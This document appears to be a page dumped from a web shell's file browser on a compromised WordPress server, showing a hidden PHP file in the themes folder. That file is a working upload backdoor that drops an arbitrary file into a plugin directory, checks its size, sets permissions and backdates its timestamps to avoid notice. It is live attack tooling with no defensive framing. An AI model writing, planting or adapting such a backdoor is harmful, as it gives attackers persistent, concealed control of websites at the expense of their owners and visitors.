HEX
Server: LiteSpeed
System: Linux php-prod-1.spaceapp.ru 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
User: xnsbb3110 (1041)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/themes/.accept
<?php   $p = "/home/l/lordrp/tipografiya_saratov_rf/public_html//home/xn----7sbbakb8ac5cgdoemgm1a3r.xn--p1ai/public_html/wp-content/new_update/plugins/smart-slider-3/library/media/plugins/widgetbullet/dbstructure"; $ft = 1662533167; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 36606) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 36606";         }         @unlink($p);     } } die('_upload_failed_');